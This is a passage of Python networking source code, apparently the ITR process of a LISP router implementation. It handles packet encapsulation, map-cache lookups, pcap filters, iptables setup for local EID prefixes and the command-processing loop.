packet.inner_dest.instance_id = iid packet.inner_source.instance_id = iid # # Print some useful header fields and strip outer headers.. # if (macs != ""): macs = ", MACs: " + macs + "," packet.print_packet("Receive {}{}".format(device, macs), False) # # Drop packet if input interface not found based on MAC address used. 
# if (device != input_interface and device != "lispers.net"): lisp.dprint("Not our MAC address on interface {}, pcap interface {}". \ format(input_interface, device)) return #endif lisp_decent = lisp.lisp_decent_push_configured if (lisp_decent): multicast = packet.inner_dest.is_multicast_address() local = packet.inner_source.is_local() lisp_decent = (local and multicast) #endif if (lisp_decent == False): # # Only forward packets from source-EIDs. # db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False) if (db == None): lisp.dprint("Packet received from non-EID source") return #endif # # Check to see if we are doing dynamic-EID discovery. # if (db.dynamic_eid_configured()): i = lisp.lisp_allow_dynamic_eid(input_interface, packet.inner_source) if (i): lisp.lisp_itr_discover_eid(db, packet.inner_source, input_interface, i, lisp_ipc_listen_socket) else: e = lisp.green(packet.inner_source.print_address(), False) lisp.dprint("Disallow dynamic-EID {} on interface {}".format(e, input_interface)) return #endif #endif if (packet.inner_source.is_local() and packet.udp_dport == lisp.LISP_CTRL_PORT): return #endif # # Do input processing for currently supported packet types.. # igmp = False if (packet.inner_version == 4): igmp, packet.packet = lisp.lisp_ipv4_input(packet.packet) if (packet.packet == None): return packet.inner_ttl -= 1 elif (packet.inner_version == 6): packet.packet = lisp.lisp_ipv6_input(packet) if (packet.packet == None): return packet.inner_ttl -= 1 else: packet.packet = lisp.lisp_mac_input(packet.packet) if (packet.packet == None): return packet.encap_port = lisp.LISP_L2_DATA_PORT #endif # # First check if destination is to any local EID-prefixes from database- # mapping commands. In this case, we need to natively forward. # if (lisp_xtr_loopback == False): db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False) if (db and db.dynamic_eid_configured == False): lisp.dprint(("Packet destined to local EID-prefix {}, " + \ "natively forwarding").format(db.print_eid_tuple())) packet.send_packet(lisp_raw_socket, packet.inner_dest) return #endif #endif # # Do map-cache lookup. # mc = lisp.lisp_map_cache_lookup(packet.inner_source, packet.inner_dest) if (mc): mc.add_recent_source(packet.inner_source) # # If "secondary-iid" is configured, we want to check the secondary # map-cache if a lookup miss occured in the default IID for this source # EID-prefix. If destination EID found in secondary map-cache, use it. # Otherwise, send Map-Request for EID in default IID. # secondary_iid = db.secondary_iid if (db != None) else None if (secondary_iid and mc and mc.action == lisp.LISP_NATIVE_FORWARD_ACTION): dest_eid = packet.inner_dest dest_eid.instance_id = secondary_iid mc = lisp.lisp_map_cache_lookup(packet.inner_source, dest_eid) if (mc): mc.add_recent_source(packet.inner_source) #endif # # Map-cache lookup miss. # if (mc == None or lisp.lisp_mr_or_pubsub(mc.action)): if (lisp.lisp_rate_limit_map_request(packet.inner_dest)): return pubsub = (mc and mc.action == lisp.LISP_SEND_PUBSUB_ACTION) lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port, packet.inner_source, packet.inner_dest, None, pubsub) if (packet.is_trace()): lisp.lisp_trace_append(packet, reason="map-cache miss") #endif return #endif # # Send Map-Request to see if there is a RLOC change or to refresh an # entry that is about to time out. 
# if (mc and mc.is_active() and mc.has_ttl_elapsed()): if (lisp.lisp_rate_limit_map_request(packet.inner_dest) == False): lisp.lprint("Refresh map-cache entry {}".format( \ lisp.green(mc.print_eid_tuple(), False))) lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port, packet.inner_source, packet.inner_dest, None) #endif #endif # # Update stats for entry. Stats per RLOC is done in lisp_mapping.select_ # rloc(). # mc.last_refresh_time = time.time() mc.stats.increment(len(packet.packet)) # # Encapsulate, native forward, or encapsulate-and-replciate packet. # dest_rloc, dest_port, nonce, action, rle, rloc_entry = \ mc.select_rloc(packet, lisp_ipc_listen_socket) if (dest_rloc == None and rle == None): if (action == lisp.LISP_NATIVE_FORWARD_ACTION): lisp.dprint("Natively forwarding") packet.send_packet(lisp_raw_socket, packet.inner_dest) if (packet.is_trace()): lisp.lisp_trace_append(packet, reason="not an EID") #endif return #endif r = "No reachable RLOCs found" lisp.dprint(r) if (packet.is_trace()): lisp.lisp_trace_append(packet, reason=r) return #endif if (dest_rloc and dest_rloc.is_null()): r = "Drop action RLOC found" lisp.dprint(r) if (packet.is_trace()): lisp.lisp_trace_append(packet, reason=r) return #endif # # Setup outer header for either unicast or multicast transmission.. # packet.outer_tos = packet.inner_tos packet.outer_ttl = 32 if (igmp) else packet.inner_ttl # # Do unicast encapsulation. # if (dest_rloc): packet.outer_dest.copy_address(dest_rloc) version = packet.outer_dest.afi_to_version() packet.outer_version = version source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \ lisp.lisp_myrlocs[1] packet.outer_source.copy_address(source_rloc) if (packet.is_trace()): if (lisp.lisp_trace_append(packet, rloc_entry=rloc_entry) \ == False): return #endif # # Encode new LISP, UDP, and outer header. # if (packet.encode(nonce) == None): return if (len(packet.packet) <= 1500): packet.print_packet("Send", True) # # Send out on raw socket. # raw_socket = lisp_raw_v6_socket if version == 6 else lisp_raw_socket packet.send_packet(raw_socket, packet.outer_dest) elif (rle): # # Do replication of RLE is returned. Since we are an ITR, replicate to # level-0 RTRs (or ETRs) only (or first-level boxes only).. # level = rle.rle_nodes[0].level orig_len = len(packet.packet) for node in rle.rle_forwarding_list: if (node.level != level): return packet.outer_dest.copy_address(node.address) if (lisp_decent): packet.inner_dest.instance_id = 0xffffff version = packet.outer_dest.afi_to_version() packet.outer_version = version source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \ lisp.lisp_myrlocs[1] packet.outer_source.copy_address(source_rloc) if (packet.is_trace()): if (lisp.lisp_trace_append(packet) == False): return #endif if (packet.encode(None) == None): return # # Replicate out on raw socket. # packet.print_packet("Replicate-to-L{}".format(node.level), True) packet.send_packet(lisp_raw_socket, packet.outer_dest) # # We need to strip the encapsulation header so we can add a new # one for the next replication. # strip_len = len(packet.packet) - orig_len packet.packet = packet.packet[strip_len::] #endfor #endif # # Don't need packet structure anymore. # del(packet) return #enddef # # lisp_itr_pcap_process_packet # # Receive LISP encapsulated packet from pcap.loop(). 
# def lisp_itr_pcap_process_packet(device, not_used, packet): offset = 4 if device == "lo0" else 0 if device == "lispers.net" else 14 if (lisp.lisp_frame_logging): title = lisp.bold("Received frame on interface '{}'".format(device), False) frame = lisp.lisp_format_packet(packet[0:64]) lisp.lprint("{}: {}".format(title, frame)) #endif # # Get input interface based on source MAC address. # macs = "" my_sa = False interface = device if (offset == 14): interfaces, sa, da, my_sa = lisp.lisp_get_input_interface(packet) interface = device if (device in interfaces) else interfaces[0] macs = lisp.lisp_format_macs(sa, da) if (interface.find("vlan") != -1): offset +=4 # # If destination MAC address is multicast, set my_sa. Examine low-order # bit of first byte by grabbing the second nibble and testing low-order # bit after converting to integer. # if (int(da[1], 16) & 1): my_sa = True #endif # # Check for VLAN encapsulation. # if (offset != 0): ethertype = struct.unpack("H", packet[offset-2:offset])[0] ethertype = socket.ntohs(ethertype) if (ethertype == 0x8100): vlan = struct.unpack("I", packet[offset:offset+4])[0] vlan = socket.ntohl(vlan) interface = "vlan" + str(vlan >> 16) offset += 4 elif (ethertype == 0x806): lisp.dprint("Dropping ARP packets, host should have default route") return #endif #endif if (lisp.lisp_l2_overlay): offset = 0 lisp_itr_data_plane(packet[offset::], device, interface, macs, my_sa) return #enddef # # lisp_itr_kernel_filter # # Supplied 'sources' array are the EID-prefixes we want the kernel to drop # packets for. We will use iptables for Linux and ipfw for MacOS. # # We need this address combination support (notation S -> D): # # site-EID -> remote-EID processed by ITR # site-EID -> non-EID processed by ITR # site-EID -> site-EID processed by kernel # non-EID -> non-EID processed by kernel # non-EID -> remote-EID processed by kernel # non-EID -> site-EID processed by kernel # # The pcap filters reflect the ITR processing combos and can be found in # lisp_itr_build_pcap_filter(). This routine programs iptables to do the # kernel processing combos. # # (1) iptables -t raw -A lisp -j ACCEPT -d <special-addresses> # (2) iptables -t raw -A lisp -j ACCEPT -d <local-address> ... # (3) iptables -t raw -A lisp -j ACCEPT -s <site-eid> -d <site-eid> ... # (4) iptables -t raw -A lisp -j DROP -s <site-eid> ... # # (1) and (2), we want kernel to route packets. This allows loopback and # multicast to be processed by kernel. # # For (3), we want the kernel to do local routing of packets inside of a site # in this ITR. # # For (4), we want kernel to not touch any packets sourced from locally # configured EIDs. That is each EID-prefix from a "lisp database-mapping" # command. Because those EID-prefixes are pcap'ed and process by the lisp-itr # process. # def lisp_itr_kernel_filter(sources, dyn_eids): if (os.getenv("LISP_NO_IPTABLES") != None): lisp.lprint("User selected to suppress installing iptables rules") return #endif os.system("sudo iptables -t raw -N lisp") os.system("sudo iptables -t raw -A PREROUTING -j lisp") os.system("sudo ip6tables -t raw -N lisp") os.system("sudo ip6tables -t raw -A PREROUTING -j lisp") # # Have kernel process packets for local addresses when sourced from site # EIDs. We do not want the lisp-itr process to process such packets. # We want the kernel to deliver packets to and from local applications. # And we want the kernel to forward decapsulated packets out interfaces # leading the EIDs. 
# add = "sudo ip{}tables -t raw -A lisp -j ACCEPT -d {}" addr_set = ["127.0.0.1", "::1", "224.0.0.0/4 -p igmp", "ff00::/8", "fe80::/16"] addr_set += sources + lisp.lisp_get_all_addresses() for addr in addr_set: if (lisp.lisp_is_mac_string(addr)): continue six = "" if addr.find(":") == -1 else "6" os.system(add.format(six, addr)) #endfor # # When source and destination addresses are EIDs for this LISP site, # we want the kernel to do local routing. But as a PITR, we don't want # the kernel to route everything (EID-prefix 0.0.0.0/0) or we can't have # this process encapsulate for any source address to a destination EID. # if (lisp.lisp_pitr == False): add = "sudo ip{}tables -t raw -A lisp -j ACCEPT -s {} -d {}" check = "sudo ip{}tables -t raw -C lisp -j ACCEPT -s {} -d {}" for source in sources: if (lisp.lisp_is_mac_string(source)): continue if (source in dyn_eids): continue six = "" if source.find(":") == -1 else "6" for s in sources: if (lisp.lisp_is_mac_string(s)): continue if (s in dyn_eids): continue if (s.find(".") != -1 and source.find(".") == -1): continue if (s.find(":") != -1 and source.find(":") == -1): continue if (getoutput(check.format(six, source, s)) == ""): continue #endif os.system(add.format(six, source, s)) #endfor #endfor #endif # # Now put in drop rules for each "lisp database-mapping" EID-prefix. # drop = "sudo ip{}tables -t raw -A lisp -j DROP -s {}" for source in sources: if (lisp.lisp_is_mac_string(source)): continue six = "" if source.find(":") == -1 else "6" os.system(drop.format(six, source)) #endif # # Print out rules we just configured. # rules = getoutput("sudo iptables -t raw -S lisp").split("\n") rules += getoutput("sudo ip6tables -t raw -S lisp").split("\n") lisp.lprint("Using kernel filters: {}".format(rules)) # # Check if we need to put in a iptables rule workaround for the virtio TCP # checksum corruption problem for KVM guest OSes. Check environmnt # variable LISP_VIRTIO_BUG. # # Note a debian host system that runs docker will need the following # command so ip6tables works inside of the docker container: # # sudo modprobe ip6table_filter # if (os.getenv("LISP_VIRTIO_BUG") != None): c = ("sudo iptables -A POSTROUTING -t mangle -p tcp -j " + \ "CHECKSUM --checksum-fill; ") c += ("sudo iptables -A POSTROUTING -t mangle -p udp -j " + \ "CHECKSUM --checksum-fill; ") c += ("sudo ip6tables -A POSTROUTING -t mangle -p tcp -j " + \ "CHECKSUM --checksum-fill; ") c += ("sudo ip6tables -A POSTROUTING -t mangle -p udp -j " + \ "CHECKSUM --checksum-fill") os.system(c) virtio = lisp.bold("virtio", False) lisp.lprint("{} bug workaround, configure '{}'".format(virtio, c)) #endif return #enddef # # lisp_itr_build_pcap_filter # # Build pcap filter and return string to caller. 
# def lisp_itr_build_pcap_filter(sources, dyn_eids, l2_overlay, pitr): if (l2_overlay): pfilter = "ether[6:4] >= 0 and ether[10:2] >= 0" lisp.lprint("Using pcap filter: '{}'".format(pfilter)) return(pfilter) #endif ether_pfilter = "(not ether proto 0x806)" probe_pfilter = " or (udp src port 4342 and ip[28] == 0x28)" decent_pfilter = \ " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)" src_pfilter = "" dst_pfilter = "" for source in sources: insert_source = source if (lisp.lisp_is_mac_string(source)): insert_source = source.split("/")[0] insert_source = insert_source.replace("-", "") mac_str = [] for i in range(0, 12, 2): mac_str.append(insert_source[i:i+2]) insert_source = "ether host " + ":".join(mac_str) #endif src_pfilter += "{}".format(insert_source) if (source not in dyn_eids): dst_pfilter += "{}".format(insert_source) if (sources[-1] == source): break src_pfilter += " or " if (source not in dyn_eids): dst_pfilter += " or " #endfor if (dst_pfilter[-4::] == " or "): dst_pfilter = dst_pfilter[0:-4] # # If "lisp-nat = yes" is configured, then we are a PETR and we need # to accept packets for local EIDs (assigned to loopback interfaces). # So allow the first one to be accepted. # lisp_nat = getoutput("egrep 'lisp-nat = yes' ./lisp.config") lisp_nat = (lisp_nat != "" and lisp_nat[0] == " ") loopback = lisp.lisp_get_loopback_address() if (lisp_nat) else None addr_pfilter = "" addresses = lisp.lisp_get_all_addresses() for addr in addresses: if (addr == loopback): continue addr_pfilter += "{}".format(addr) if (addresses[-1] == addr): break addr_pfilter += " or " #endif if (src_pfilter != ""): src_pfilter = " and (src net {})".format(src_pfilter) #endif if (dst_pfilter != ""): dst_pfilter = " and not (dst net {})".format(dst_pfilter) #endif if (addr_pfilter != ""): addr_pfilter = " and not (dst host {})".format(addr_pfilter) #endif # # A PITR wants to see packets from anywhere so it can encap to possible # LISP sites. But we want the kernel to route and consume for RLOCs for # this system. # if (pitr): dst_pfilter = "" addr_pfilter = addr_pfilter.replace("dst ", "") #endif # # Concatenate all the filters. # pfilter = ether_pfilter + src_pfilter + dst_pfilter + addr_pfilter pfilter += probe_pfilter pfilter += decent_pfilter lisp.lprint("Using pcap filter: '{}'".format(pfilter)) return(pfilter) #enddef # # lisp_itr_pcap_thread # # Receive LISP encapsulated packet from pcap. # def lisp_itr_pcap_thread(device, pfilter, pcap_lock): lisp.lisp_set_exception() if (lisp.lisp_is_python2()): import pcappy pcap_lock.acquire() pcap = pcappy.open_live(device, 9000, 0, 100) pcap_lock.release() pcap.filter = pfilter pcap.loop(-1, lisp_itr_pcap_process_packet, device) #endif if (lisp.lisp_is_python3()): import pcapy pcap_lock.acquire() pcap = pcapy.open_live(device, 9000, 0, 100) pcap_lock.release() pcap.setfilter(pfilter) while(True): header, packet = pcap.next() if (len(packet) == 0): continue lisp_itr_pcap_process_packet(device, None, packet) #endwhile #endif return #enddef # # lisp_itr_process_info_timer # # Time to send a periodic Info-Request message. This must be done less often # then sending periodic Map-Registers as well as less the the NAT timeout # value which is usually one minute. # def lisp_itr_process_info_timer(): global lisp_itr_info_timer global lisp_ephem_nat_socket global lisp_send_sockets lisp.lisp_set_exception() # # Build Info-Request messages if we have any private RLOCs in database- # mappings. 
# sockets = [lisp_ephem_nat_socket, lisp_ephem_nat_socket, lisp_ipc_listen_socket] lisp.lisp_build_info_requests(sockets, None, lisp.LISP_CTRL_PORT) # # Restart periodic timer. # lisp_itr_info_timer.cancel() lisp_itr_info_timer = threading.Timer(lisp.LISP_INFO_INTERVAL, lisp_itr_process_info_timer, []) lisp_itr_info_timer.start() return #enddef # # lisp_itr_map_resolver_command # # Call lispconfig.lisp_map_resolver_command and set "test-mr" timer. # def lisp_itr_map_resolver_command(kv_pair): global lisp_send_sockets global lisp_ephem_port global lisp_itr_info_timer lispconfig.lisp_map_resolver_command(kv_pair) if (lisp.lisp_test_mr_timer == None or lisp.lisp_test_mr_timer.is_alive() == False): lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr, [lisp_send_sockets, lisp_ephem_port]) lisp.lisp_test_mr_timer.start() #endif # # Trigger a Info-Request if we are doing NAT-traversal. # lisp_itr_info_timer = threading.Timer(0, lisp_itr_process_info_timer, []) lisp_itr_info_timer.start() return #enddef # # lisp_itr_database_mapping_command # # Add database-mapping entry so ITR can packet capture on packets only from # sources from the *first* database-mapping configured. # def lisp_itr_database_mapping_command(kv_pair): lispconfig.lisp_database_mapping_command(kv_pair) return #enddef # # lisp_itr_xtr_command # # Call lispconfig.lisp_xtr_command() but pass socket parameters to starting # the RLOC-probing timer if "rloc-probing = yes". # def lisp_itr_xtr_command(kv_pair): global lisp_ephem_listen_socket global lisp_rloc_probe_socket # # Cache current state for nat-traversal and rloc-probing so we know if # we should trigger.. # nat_traversal = lisp.lisp_nat_traversal rloc_probing = lisp.lisp_rloc_probing # # Execute command. # lispconfig.lisp_xtr_command(kv_pair) # # Did "nat-traversal = yes" or "rloc-probing = yes" just happen? # nat_now_on = (nat_traversal == False and lisp.lisp_nat_traversal and \ lisp.lisp_rloc_probing) rloc_probing_now_on = (rloc_probing == False and lisp.lisp_rloc_probing) interval = 0 if (rloc_probing_now_on): interval = 1 if (nat_now_on): interval = 5 if (interval != 0): lisp_sockets = [lisp_rloc_probe_socket, lisp_ephem_listen_socket] lisp.lisp_start_rloc_probe_timer(interval, lisp_sockets) #endif # # If nat-traversal=yes and data-plane-security=yes on an ITR, then we # need to set source port in RLOC-probe requrests and encapsulated data # packets to be the same value. # if (lisp.lisp_crypto_ephem_port == None and lisp.lisp_data_plane_security): port = lisp_ephem_listen_socket.getsockname()[1] lisp.lisp_crypto_ephem_port = port lisp.lprint("Use port {} for lisp-crypto packets".format(port)) entry = { "type" : "itr-crypto-port", "port" : port } lisp.lisp_write_to_dp_socket(entry) #endif # # Write to external data-plane if enabled. # lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging, lisp.lisp_data_plane_logging) return #enddef # # lisp_itr_process_nonce_ipc # # Process an nonce IPC message from the ETR. It wants to tell us that a # request-nonce was received and we need to echo it or when this ITR requested # a nonce to be echoed, the ETR is telling us it has been echoed. # # Variable "ipc" is a string and not a byte string. Caller converts. 
# def lisp_itr_process_nonce_ipc(ipc): x, opcode, rloc_str, nonce = ipc.split("%") nonce = int(nonce, 16) echo_nonce = lisp.lisp_get_echo_nonce(None, rloc_str) if (echo_nonce == None): echo_nonce = lisp.lisp_echo_nonce(rloc_str) # # If we are in request-nonce mode, exit it, so we can echo the nonce the # other side is requesting. # if (opcode == "R"): echo_nonce.request_nonce_rcvd = nonce echo_nonce.last_request_nonce_rcvd = lisp.lisp_get_timestamp() echo_nonce.echo_nonce_sent = nonce echo_nonce.last_new_echo_nonce_sent = lisp.lisp_get_timestamp() lisp.lprint("Start echo-nonce mode for {}, nonce 0x{}".format( \ lisp.red(echo_nonce.rloc_str, False), lisp.lisp_hex_string(nonce))) #endif if (opcode == "E"): echo_nonce.echo_nonce_rcvd = nonce echo_nonce.last_echo_nonce_rcvd = lisp.lisp_get_timestamp() if (echo_nonce.request_nonce_sent == nonce): en = lisp.bold("echoed nonce", False) lisp.lprint("Received {} {} from {}".format(en, lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False))) echo_nonce.request_nonce_sent = None lisp.lprint("Stop request-nonce mode for {}".format( \ lisp.red(echo_nonce.rloc_str, False))) echo_nonce.last_good_echo_nonce_rcvd = lisp.lisp_get_timestamp() else: rns = "none" if (echo_nonce.request_nonce_sent): rns = lisp.lisp_hex_string(echo_nonce.request_nonce_sent) #endif lisp.lprint(("Received echo-nonce 0x{} from {}, but request-" + \ "nonce is {}").format(lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False), rns)) #endif #endif return #enddef # # ITR commands procssed by this process. # lisp_itr_commands = { "lisp xtr-parameters" : [lisp_itr_xtr_command, { "rloc-probing" : [True, "yes", "no"], "nonce-echoing" : [True, "yes", "no"], "data-plane-security" : [True, "yes", "no"], "data-plane-logging" : [True, "yes", "no"], "frame-logging" : [True, "yes", "no"], "flow-logging" : [True, "yes", "no"], "nat-traversal" : [True, "yes", "no"], "checkpoint-map-cache" : [True, "yes", "no"], "ipc-data-plane" : [True, "yes", "no"], "decentralized-push-xtr" : [True, "yes", "no"], "decentralized-pull-xtr-modulus" : [True, 1, 0xff], "decentralized-pull-xtr-dns-suffix" : [True], "register-reachable-rtrs" : [True, "yes", "no"], "program-hardware" : [True, "yes", "no"] }], "lisp interface" : [lispconfig.lisp_interface_command, { "interface-name" : [True], "device" : [True], "instance-id" : [True, 0, 0xffffffff], "dynamic-eid" : [True], "multi-tenant-eid" : [True], "lisp-nat" : [True, "yes", "no"], "dynamic-eid-device" : [True], "dynamic-eid-timeout" : [True, 0, 0xff] }], "lisp map-resolver" : [lisp_itr_map_resolver_command, { "mr-name" : [True], "ms-name" : [True], "dns-name" : [True], "address" : [True] }], "lisp map-server" : [lispconfig.lisp_map_server_command, { "ms-name" : [True], "address" : [True], "dns-name" : [True], "authentication-type" : [False, "sha1", "sha2"], "authentication-key" : [False], "encryption-key" : [False], "proxy-reply" : [False, "yes", "no"], "want-map-notify" : [False, "yes", "no"], "merge-registrations" : [False, "yes", "no"], "refresh-registrations" : [False, "yes", "no"], "site-id" : [False, 1, 0xffffffffffffffff] }], "lisp database-mapping" : [lisp_itr_database_mapping_command, { "prefix" : [], "mr-name" : [True], "ms-name" : [True], "instance-id" : [True, 0, 0xffffffff], "secondary-instance-id" : [True, 0, 0xffffffff], "eid-prefix" : [True], "group-prefix" : [True], "dynamic-eid" : [True, "yes", "no"], "signature-eid" : [True, "yes", "no"], "register-ttl" : [True, 1, 0xffffffff], "rloc" : [], "rloc-record-name" : [True], 
"elp-name" : [True], "geo-name" : [True], "rle-name" : [True], "json-name" : [True], "address" : [True], "interface" : [True], "priority" : [True, 0, 255], "weight" : [True, 0, 100] }], "lisp map-cache" : [lispconfig.lisp_map_cache_command, { "prefix" : [], "instance-id" : [True, 0, 0xffffffff], "eid-prefix" : [True], "group-prefix" : [True], "send-map-request" : [True, "yes", "no"], "subscribe-request" : [True, "yes", "no"], "rloc" : [], "rloc-record-name" : [True], "rle-name" : [True], "elp-name" : [True], "address" : [True], "priority" : [True, 0, 255], "weight" : [True, 0, 100] }], "lisp itr-map-cache" : [lispconfig.lisp_map_cache_command, { "prefix" : [], "instance-id" : [True, 0, 0xffffffff], "eid-prefix" : [True], "group-prefix" : [True], "rloc" : [], "rloc-record-name" : [True], "rle-name" : [True], "elp-name" : [True], "address" : [True], "priority" : [True, 0, 255], "weight" : [True, 0, 100] }], "lisp explicit-locator-path" : [lispconfig.lisp_elp_command, { "elp-name" : [False], "elp-node" : [], "address" : [True], "probe" : [True, "yes", "no"], "strict" : [True, "yes", "no"], "eid" : [True, "yes", "no"] }], "lisp replication-list-entry" : [lispconfig.lisp_rle_command, { "rle-name" : [False], "rle-node" : [], "address" : [True], "level" : [True, 0, 255] }], "lisp geo-coordinates" : [lispconfig.lisp_geo_command, { "geo-name" : [False], "geo-tag" : [False] }], "lisp json" : [lispconfig.lisp_json_command, { "json-name" : [False], "json-string" : [False] }], "show itr-map-cache" : [lisp_itr_show_command, { }], "show itr-rloc-probing" : [lisp_itr_show_rloc_probe_command, { }], "show itr-keys" : [lisp_itr_show_keys_command, {}], "show itr-dynamic-eid" : [lispconfig.lisp_show_dynamic_eid_command, { }] } #------------------------------------------------------------------------------ # # Main entry point for process. # if (lisp_itr_startup() == False): lisp.lprint("lisp_itr_startup() failed") lisp.lisp_print_banner("ITR abnormal exit") exit(1) #endif socket_list = [lisp_ephem_listen_socket, lisp_ipc_listen_socket, lisp_ephem_nat_socket, lisp_ipc_punt_socket] # # Should we listen to the map-cache/punt IPC socket if it exists. # listen_on_ipc_socket = True ephem_sockets = [lisp_ephem_listen_socket] * 3 ephem_nat_sockets = [lisp_ephem_nat_socket] * 3 while (True): try: ready_list, w, x = select.select(socket_list, [], []) except: break # # Process Punt signal message from another data-plane (snabb). # if (lisp.lisp_ipc_data_plane and lisp_ipc_punt_socket in ready_list): lisp.lisp_process_punt(lisp_ipc_punt_socket, lisp_send_sockets, lisp_ephem_port) #endif # # Process Map-Reply messages received on ephemeral port. # if (lisp_ephem_listen_socket in ready_list): opcode, source, port, packet = lisp.lisp_receive(ephem_sockets[0], False) if (source == ""): break if (lisp.lisp_is_rloc_probe_reply(packet[0:1])): lisp.lprint("ITR ignoring RLOC-probe reply, using pcap") continue #endif lisp.lisp_parse_packet(ephem_sockets, packet, source, port) #endif # # Process Info-Reply messages received on NAT ephemeral port. # if (lisp_ephem_nat_socket in ready_list): opcode, source, port, packet = lisp.lisp_receive(ephem_nat_sockets[0], False) if (source == ""): break if (lisp.lisp_is_rloc_probe_reply(packet[0:1])): lisp.lprint("ITR ignoring RLOC-probe reply, using pcap") continue #endif probe = lisp.lisp_parse_packet(ephem_nat_sockets, packet, source, port) # # Info-Reply has new RTR-list, RLOC-probe the RTR RLOCs so we can # lisp-crypto faster. 
        #
        if (probe):
            lisp_sockets = [lisp_ephem_listen_socket,
                lisp_ephem_listen_socket]
            lisp.lisp_start_rloc_probe_timer(0, lisp_sockets)
        #endif
    #endif

    #
    # Process either commands, an IPC data-packet (for testing), or any
    # protocol message on the IPC listen socket.
    #
    if (lisp_ipc_listen_socket in ready_list):
        opcode, source, port, packet = \
            lisp.lisp_receive(lisp_ipc_listen_socket, True)
        if (source == ""): break

        if (opcode == "command"):
            packet = packet.decode()
            if (packet == "clear"):
                lisp.lisp_clear_map_cache()
                continue
            #endif
            if (packet.find("nonce%") != -1):
                lisp_itr_process_nonce_ipc(packet)
                continue
            #endif
            lispconfig.lisp_process_command(lisp_ipc_listen_socket, opcode,
                packet, "lisp-itr", [lisp_itr_commands])
        elif (opcode == "api"):
            packet = packet.decode()
            lisp.lisp_process_api("lisp-itr", lisp_ipc_listen_socket, packet)
        elif (opcode == "data-packet"):
            lisp_itr_data_plane(packet, "ipc")
        else:
            if (lisp.lisp_is_rloc_probe_reply(packet[0:1])):
                lisp.lprint("ITR ignoring RLOC-probe request, using pcap")
                continue
            #endif
            lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
        #endif
    #endif
#endwhile

lisp_itr_shutdown()
lisp.lisp_print_banner("ITR normal exit")
exit(0)

#------------------------------------------------------------------------------